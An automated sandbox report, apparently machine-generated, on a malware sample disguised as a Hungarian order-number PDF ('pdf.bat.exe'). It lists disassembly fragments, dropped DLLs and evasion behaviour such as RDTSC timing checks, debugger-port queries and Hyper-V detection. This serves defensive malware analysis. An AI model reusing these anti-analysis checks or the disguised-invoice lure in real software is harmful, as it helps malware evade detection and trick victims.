            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exe Code function: 0_2_6FBC2FD0 push eax; ret 0_2_6FBC2FFE
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exe Code function: 5_2_335609AD push ecx; mov dword ptr [esp], ecx 5_2_335609B6
            Source: C:\Windows\SysWOW64\sdchange.exe Code function: 7_2_04B427FA pushad ; ret 7_2_04B427F9
            Source: C:\Windows\SysWOW64\sdchange.exe Code function: 7_2_04B4225F pushad ; ret 7_2_04B427F9
            Source: C:\Windows\SysWOW64\sdchange.exe Code function: 7_2_04B4283D push eax; iretd 7_2_04B42858
            Source: C:\Windows\SysWOW64\sdchange.exe Code function: 7_2_04B709AD push ecx; mov dword ptr [esp], ecx 7_2_04B709B6
            Source: C:\Windows\SysWOW64\sdchange.exe Code function: 7_2_04B418F3 push edx; ret 7_2_04B41906
            Source: C:\Windows\SysWOW64\sdchange.exe Code function: 7_2_02C6C715 pushad ; retf 7_2_02C6C718
            Source: C:\Windows\SysWOW64\sdchange.exe Code function: 7_2_02C5E8DC push ds; retf 7_2_02C5E8E3
            Source: C:\Windows\SysWOW64\sdchange.exe Code function: 7_2_02C7091D pushad ; iretd 7_2_02C7091E
            Source: C:\Windows\SysWOW64\sdchange.exe Code function: 7_2_02C60CA1 push CD2A7FC7h; retf 7_2_02C60CA6
            Source: C:\Windows\SysWOW64\sdchange.exe Code function: 7_2_02C5149A pushfd ; ret 7_2_02C5149D
            Source: C:\Windows\SysWOW64\sdchange.exe Code function: 7_2_02C51AD6 push ss; retf 7_2_02C51B12
            Source: C:\Windows\SysWOW64\sdchange.exe Code function: 7_2_02C67A01 pushad ; ret 7_2_02C67A05
            Source: C:\Windows\SysWOW64\sdchange.exe Code function: 7_2_02C61B79 push es; ret 7_2_02C61B78
            Source: C:\Windows\SysWOW64\sdchange.exe Code function: 7_2_02C61B12 push es; ret 7_2_02C61B78
            Source: C:\Windows\SysWOW64\sdchange.exe Code function: 7_2_02C578D4 push eax; retf 7_2_02C578D5
            Source: C:\Windows\SysWOW64\sdchange.exe Code function: 7_2_02C6F84F push esi; ret 7_2_02C6F857
            Source: C:\Windows\SysWOW64\sdchange.exe Code function: 7_2_02C6B9DF push ebx; ret 7_2_02C6B9EB
            Source: C:\Windows\SysWOW64\sdchange.exe Code function: 7_2_02C67C19 push esi; ret 7_2_02C67C27
            Source: C:\Windows\SysWOW64\sdchange.exe Code function: 7_2_02C67C20 push esi; ret 7_2_02C67C27
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exe File created: C:\Users\user\AppData\Local\Temp\nso4347.tmp\System.dll
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exe File created: C:\Users\user\AppData\Local\Temp\nso4347.tmp\LangDLL.dll
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exe Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\sdchange.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

            Malware Analysis System Evasion

            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exe API/Special instruction interceptor: Address: 54464CE
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exe API/Special instruction interceptor: Address: 20464CE
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exe RDTSC instruction interceptor: First address: 540467D second address: 540467D instructions: 0x00000000 rdtsc 0x00000002 test ecx, edx 0x00000004 cmp ebx, ecx 0x00000006 jc 00007FDA20535368h 0x00000008 inc ebp 0x00000009 inc ebx 0x0000000a rdtsc
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exe RDTSC instruction interceptor: First address: 200467D second address: 200467D instructions: 0x00000000 rdtsc 0x00000002 test ecx, edx 0x00000004 cmp ebx, ecx 0x00000006 jc 00007FDA20DE4298h 0x00000008 inc ebp 0x00000009 inc ebx 0x0000000a rdtsc
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exe Code function: 5_2_335DD1C0 rdtsc 5_2_335DD1C0
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nso4347.tmp\System.dll
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nso4347.tmp\LangDLL.dll
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exe API coverage: 0.2 %
            Source: C:\Windows\SysWOW64\sdchange.exe API coverage: 1.2 %
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exe Code function: 0_2_004065C7 FindFirstFileW,FindClose, 0_2_004065C7
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exe Code function: 0_2_00405996 GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose, 0_2_00405996
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exe Code function: 0_2_00402868 FindFirstFileW, 0_2_00402868
            Source: Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exe, 00000005.00000002.2945021346.00000000033A8000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAWx
            Source: Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exe, 00000005.00000003.2834132563.000000000340A000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
            Source: Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exe, 00000005.00000002.2945141009.00000000033FE000.00000004.00000020.00020000.00000000.sdmp, Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exe, 00000005.00000003.2834132563.00000000033FE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW|`
            Source: sdchange.exe, 00000007.00000002.2971107059.0000000002EC6000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exe API call chain: ExitProcess graph end node graph_0-4984
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exe API call chain: ExitProcess graph end node graph_0-4976
            Source: C:\Windows\SysWOW64\sdchange.exe Process information queried: ProcessInformation
            Source: C:\Windows\SysWOW64\sdchange.exe Process queried: DebugPort
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exe Code function: 5_2_335DD1C0 rdtsc 5_2_335DD1C0
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exe Code function: 5_2_335A35C0 NtCreateMutant,LdrInitializeThunk, 5_2_335A35C0
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exe Code function: 0_2_6FBC1B63 GlobalAlloc,lstrcpyW,lstrcpyW,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,lstrcpyW,GetModuleHandleW,LoadLibraryW,GetProcAddress,lstrlenW, 0_2_6FBC1B63
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeCode function: 5_2_33571070 mov eax, dword ptr fs:[00000030h]5_2_33571070
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeCode function: 5_2_33571070 mov eax, dword ptr fs:[00000030h]5_2_33571070
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeCode function: 5_2_33571070 mov eax, dword ptr fs:[00000030h]5_2_33571070
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeCode function: 5_2_33571070 mov eax, dword ptr fs:[00000030h]5_2_33571070
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeCode function: 5_2_33571070 mov eax, dword ptr fs:[00000030h]5_2_33571070
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeCode function: 5_2_33571070 mov eax, dword ptr fs:[00000030h]5_2_33571070
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeCode function: 5_2_335DD070 mov ecx, dword ptr fs:[00000030h]5_2_335DD070
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeCode function: 5_2_335E106E mov eax, dword ptr fs:[00000030h]5_2_335E106E
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeCode function: 5_2_3360705E mov ebx, dword ptr fs:[00000030h]5_2_3360705E
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeCode function: 5_2_3360705E mov eax, dword ptr fs:[00000030h]5_2_3360705E
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeCode function: 5_2_3362903E mov eax, dword ptr fs:[00000030h]5_2_3362903E
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeCode function: 5_2_3362903E mov eax, dword ptr fs:[00000030h]5_2_3362903E
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeCode function: 5_2_3362903E mov eax, dword ptr fs:[00000030h]5_2_3362903E
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeCode function: 5_2_3362903E mov eax, dword ptr fs:[00000030h]5_2_3362903E
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeCode function: 5_2_335890DB mov eax, dword ptr fs:[00000030h]5_2_335890DB
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeCode function: 5_2_335770C0 mov eax, dword ptr fs:[00000030h]5_2_335770C0
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeCode function: 5_2_335770C0 mov ecx, dword ptr fs:[00000030h]5_2_335770C0
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeCode function: 5_2_335770C0 mov ecx, dword ptr fs:[00000030h]5_2_335770C0
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeCode function: 5_2_335770C0 mov eax, dword ptr fs:[00000030h]5_2_335770C0
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeCode function: 5_2_335770C0 mov ecx, dword ptr fs:[00000030h]5_2_335770C0
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeCode function: 5_2_335770C0 mov ecx, dword ptr fs:[00000030h]5_2_335770C0
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeCode function: 5_2_335770C0 mov eax, dword ptr fs:[00000030h]5_2_335770C0
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeCode function: 5_2_335770C0 mov eax, dword ptr fs:[00000030h]5_2_335770C0
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeCode function: 5_2_335770C0 mov eax, dword ptr fs:[00000030h]5_2_335770C0
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeCode function: 5_2_335770C0 mov eax, dword ptr fs:[00000030h]5_2_335770C0
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeCode function: 5_2_335770C0 mov eax, dword ptr fs:[00000030h]5_2_335770C0
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeCode function: 5_2_335770C0 mov eax, dword ptr fs:[00000030h]5_2_335770C0
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeCode function: 5_2_335770C0 mov eax, dword ptr fs:[00000030h]5_2_335770C0
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeCode function: 5_2_335770C0 mov eax, dword ptr fs:[00000030h]5_2_335770C0
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeCode function: 5_2_335770C0 mov eax, dword ptr fs:[00000030h]5_2_335770C0
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeCode function: 5_2_335770C0 mov eax, dword ptr fs:[00000030h]5_2_335770C0
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeCode function: 5_2_335770C0 mov eax, dword ptr fs:[00000030h]5_2_335770C0
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeCode function: 5_2_335770C0 mov eax, dword ptr fs:[00000030h]5_2_335770C0
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeCode function: 5_2_335DD0C0 mov eax, dword ptr fs:[00000030h]5_2_335DD0C0
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeCode function: 5_2_335DD0C0 mov eax, dword ptr fs:[00000030h]5_2_335DD0C0
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeCode function: 5_2_336350D9 mov eax, dword ptr fs:[00000030h]5_2_336350D9
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeCode function: 5_2_335850E4 mov eax, dword ptr fs:[00000030h]5_2_335850E4
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeCode function: 5_2_335850E4 mov ecx, dword ptr fs:[00000030h]5_2_335850E4
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeCode function: 5_2_33565096 mov eax, dword ptr fs:[00000030h]5_2_33565096
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeCode function: 5_2_3359909C mov eax, dword ptr fs:[00000030h]5_2_3359909C
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeCode function: 5_2_3358D090 mov eax, dword ptr fs:[00000030h]5_2_3358D090
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeCode function: 5_2_3358D090 mov eax, dword ptr fs:[00000030h]5_2_3358D090
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeCode function: 5_2_3355D08D mov eax, dword ptr fs:[00000030h]5_2_3355D08D
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeCode function: 5_2_335ED080 mov eax, dword ptr fs:[00000030h]5_2_335ED080
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeCode function: 5_2_335ED080 mov eax, dword ptr fs:[00000030h]5_2_335ED080
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeCode function: 5_2_33573740 mov eax, dword ptr fs:[00000030h]5_2_33573740
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeCode function: 5_2_33573740 mov eax, dword ptr fs:[00000030h]5_2_33573740
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeCode function: 5_2_33573740 mov eax, dword ptr fs:[00000030h]5_2_33573740
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeCode function: 5_2_33633749 mov eax, dword ptr fs:[00000030h]5_2_33633749
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeCode function: 5_2_3355B765 mov eax, dword ptr fs:[00000030h]5_2_3355B765
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeCode function: 5_2_3355B765 mov eax, dword ptr fs:[00000030h]5_2_3355B765
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeCode function: 5_2_3355B765 mov eax, dword ptr fs:[00000030h]5_2_3355B765
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeCode function: 5_2_3355B765 mov eax, dword ptr fs:[00000030h]5_2_3355B765
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeCode function: 5_2_3360375F mov eax, dword ptr fs:[00000030h]5_2_3360375F
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeCode function: 5_2_3360375F mov eax, dword ptr fs:[00000030h]5_2_3360375F
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeCode function: 5_2_3360375F mov eax, dword ptr fs:[00000030h]5_2_3360375F
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeCode function: 5_2_3360375F mov eax, dword ptr fs:[00000030h]5_2_3360375F
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeCode function: 5_2_3360375F mov eax, dword ptr fs:[00000030h]5_2_3360375F
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeCode function: 5_2_3359F71F mov eax, dword ptr fs:[00000030h]5_2_3359F71F
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeCode function: 5_2_3359F71F mov eax, dword ptr fs:[00000030h]5_2_3359F71F
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeCode function: 5_2_3362972B mov eax, dword ptr fs:[00000030h]5_2_3362972B
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeCode function: 5_2_3361F72E mov eax, dword ptr fs:[00000030h]5_2_3361F72E
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeCode function: 5_2_33565702 mov eax, dword ptr fs:[00000030h]5_2_33565702
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeCode function: 5_2_33565702 mov eax, dword ptr fs:[00000030h]5_2_33565702
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeCode function: 5_2_33567703 mov eax, dword ptr fs:[00000030h]5_2_33567703
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeCode function: 5_2_3363B73C mov eax, dword ptr fs:[00000030h]5_2_3363B73C
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeCode function: 5_2_3363B73C mov eax, dword ptr fs:[00000030h]5_2_3363B73C
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeCode function: 5_2_3363B73C mov eax, dword ptr fs:[00000030h]5_2_3363B73C
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeCode function: 5_2_3363B73C mov eax, dword ptr fs:[00000030h]5_2_3363B73C
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeCode function: 5_2_33559730 mov eax, dword ptr fs:[00000030h]5_2_33559730
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeCode function: 5_2_33559730 mov eax, dword ptr fs:[00000030h]5_2_33559730
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeCode function: 5_2_3356973A mov eax, dword ptr fs:[00000030h]5_2_3356973A
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeCode function: 5_2_3356973A mov eax, dword ptr fs:[00000030h]5_2_3356973A
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeCode function: 5_2_33595734 mov eax, dword ptr fs:[00000030h]5_2_33595734
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeCode function: 5_2_33563720 mov eax, dword ptr fs:[00000030h]5_2_33563720
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeCode function: 5_2_3357F720 mov eax, dword ptr fs:[00000030h]5_2_3357F720
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeCode function: 5_2_3357F720 mov eax, dword ptr fs:[00000030h]5_2_3357F720
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeCode function: 5_2_3357F720 mov eax, dword ptr fs:[00000030h]5_2_3357F720
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeCode function: 5_2_335657C0 mov eax, dword ptr fs:[00000030h]5_2_335657C0
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeCode function: 5_2_335657C0 mov eax, dword ptr fs:[00000030h]5_2_335657C0
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeCode function: 5_2_335657C0 mov eax, dword ptr fs:[00000030h]5_2_335657C0
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeCode function: 5_2_3356D7E0 mov ecx, dword ptr fs:[00000030h]5_2_3356D7E0
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeCode function: 5_2_3361D7B0 mov eax, dword ptr fs:[00000030h]5_2_3361D7B0
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeCode function: 5_2_3361D7B0 mov eax, dword ptr fs:[00000030h]5_2_3361D7B0
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeCode function: 5_2_336337B6 mov eax, dword ptr fs:[00000030h]5_2_336337B6
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeCode function: 5_2_3358D7B0 mov eax, dword ptr fs:[00000030h]5_2_3358D7B0
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeCode function: 5_2_3361F78A mov eax, dword ptr fs:[00000030h]5_2_3361F78A
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeCode function: 5_2_3355F7BA mov eax, dword ptr fs:[00000030h]5_2_3355F7BA
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeCode function: 5_2_3355F7BA mov eax, dword ptr fs:[00000030h]5_2_3355F7BA
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeCode function: 5_2_3355F7BA mov eax, dword ptr fs:[00000030h]5_2_3355F7BA
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeCode function: 5_2_3355F7BA mov eax, dword ptr fs:[00000030h]5_2_3355F7BA
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeCode function: 5_2_3355F7BA mov eax, dword ptr fs:[00000030h]5_2_3355F7BA
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeCode function: 5_2_3355F7BA mov eax, dword ptr fs:[00000030h]5_2_3355F7BA
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeCode function: 5_2_3355F7BA mov eax, dword ptr fs:[00000030h]5_2_3355F7BA
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeCode function: 5_2_3355F7BA mov eax, dword ptr fs:[00000030h]5_2_3355F7BA
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeCode function: 5_2_3355F7BA mov eax, dword ptr fs:[00000030h]5_2_3355F7BA
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeCode function: 5_2_335EF7AF mov eax, dword ptr fs:[00000030h]5_2_335EF7AF
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeCode function: 5_2_335EF7AF mov eax, dword ptr fs:[00000030h]5_2_335EF7AF
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeCode function: 5_2_335EF7AF mov eax, dword ptr fs:[00000030h]5_2_335EF7AF
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeCode function: 5_2_335EF7AF mov eax, dword ptr fs:[00000030h]5_2_335EF7AF
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeCode function: 5_2_335EF7AF mov eax, dword ptr fs:[00000030h]5_2_335EF7AF
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeCode function: 5_2_335E97A9 mov eax, dword ptr fs:[00000030h]5_2_335E97A9
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeCode function: 5_2_33599660 mov eax, dword ptr fs:[00000030h]5_2_33599660
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeCode function: 5_2_33599660 mov eax, dword ptr fs:[00000030h]5_2_33599660
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeCode function: 5_2_335FD660 mov eax, dword ptr fs:[00000030h]5_2_335FD660
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeCode function: 5_2_33563616 mov eax, dword ptr fs:[00000030h]5_2_33563616
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeCode function: 5_2_33563616 mov eax, dword ptr fs:[00000030h]5_2_33563616
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeCode function: 5_2_33635636 mov eax, dword ptr fs:[00000030h]5_2_33635636
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeCode function: 5_2_3359F603 mov eax, dword ptr fs:[00000030h]5_2_3359F603
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeCode function: 5_2_33591607 mov eax, dword ptr fs:[00000030h]5_2_33591607
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeCode function: 5_2_3355F626 mov eax, dword ptr fs:[00000030h]5_2_3355F626
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeCode function: 5_2_3355F626 mov eax, dword ptr fs:[00000030h]5_2_3355F626
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeCode function: 5_2_3355F626 mov eax, dword ptr fs:[00000030h]5_2_3355F626
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeCode function: 5_2_3355F626 mov eax, dword ptr fs:[00000030h]5_2_3355F626
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeCode function: 5_2_3355F626 mov eax, dword ptr fs:[00000030h]5_2_3355F626
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeCode function: 5_2_3355F626 mov eax, dword ptr fs:[00000030h]5_2_3355F626
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeCode function: 5_2_3355F626 mov eax, dword ptr fs:[00000030h]5_2_3355F626
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeCode function: 5_2_3355F626 mov eax, dword ptr fs:[00000030h]5_2_3355F626
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeCode function: 5_2_3355F626 mov eax, dword ptr fs:[00000030h]5_2_3355F626
            Source: C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exeCode function: 5_2_3361D6F0 mov eax, dword ptr fs:[00000030h]5_2_3361D6F0
